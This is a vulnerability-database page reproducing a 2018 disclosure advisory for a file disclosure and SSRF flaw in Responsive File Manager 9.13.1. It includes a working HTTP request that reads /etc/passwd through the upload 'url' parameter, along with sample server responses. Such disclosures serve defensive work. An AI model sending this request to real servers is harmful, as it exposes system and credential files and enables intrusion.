Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Responsive File Manager 9.13.1 File Disclosure

🗓️ 08 Aug 2018 00:00:00Reported by Silton SantosType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 123 Views

Responsive File Manager 9.13.1 File Disclosure vulnerability impacting SSR

Code
`Responsive Filemanager v 9.13.1 [1]  
Author: Silton Santos  
  
=====[ Table of Contents ]===================================  
* Overview  
* Detailed description  
* Timeline of disclosure  
* Thanks & Acknowledgements  
* References  
  
=====[ Overview ]===================================  
  
* System affected : Responsive Filemanager  
* Software Version : 9.13.1 (other versions may also be affected).  
* Impact : Get sensitive files from the server.  
  
=====[ Detailed description ]===================================  
  
1. Submit an upload request via the "FROM URL" and intercept with any proxy;  
2. Change the parameter "url" to file:///{server_files}, in this example,  
the parameter "url" was changed to file:///etc/passwd;  
  
POST /filemanager/upload.php HTTP/1.1  
Host: www.[...]  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 27  
Cookie: last_position=testess%2F; PHPSESSID=nl9pl5vthknvec92bji990krj0  
Connection: close  
  
fldr=testess%2F&url=file:///etc/passwd  
  
3.Wait for the answer, if everything is ok, you'll get a response similar  
to this:  
  
{"files":[{"name":"passwd.txt","size":1612,"type":null,"path":"\/usr\/share\/tinymce\/www\/filemanager\/..\/source\/testess\/passwd.txt","url":"http:\/\/[...]\/source\/testess\/passwd.txt","deleteUrl":"http:\/\/[...]\/filemanager\/upload.php?file=passwd.txt","deleteType":"DELETE"}]}  
  
4. Done, access the folder inserted in the "fldr" parameter and you can be  
able to download the file from folder.  
  
P.S:If the answer is similar to the following, possibly the user of the  
service web, does not have permission on the file. If the size is equal to  
0, the file may not exist.  
  
{"files":[{"name":"passwd","size":1573,"type":null,"error":"Filetype not  
allowed"}]}  
  
=====[ Aggravating factors ]===================================  
  
This functionality uses the input of the parameter "url" at the function  
curl_exec. This function can be used by other protocols, like  
smb,ftp,scp,telnet and others, impacting on a SSRF.  
  
=====[ Timeline of disclosure ]===================================  
  
07/17/2018 - Vulnerability reported to developer in two emails. (did not  
answer)  
  
  
=====[ References  
]===========================================================  
  
[1] http://www.responsivefilemanager.com/  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Aug 2018 00:00Current
7.4High risk
Vulners AI Score7.4
file disclosuresensitive filesserverupload requestsecurity impactfilemanagerssrftimelinereferences.
123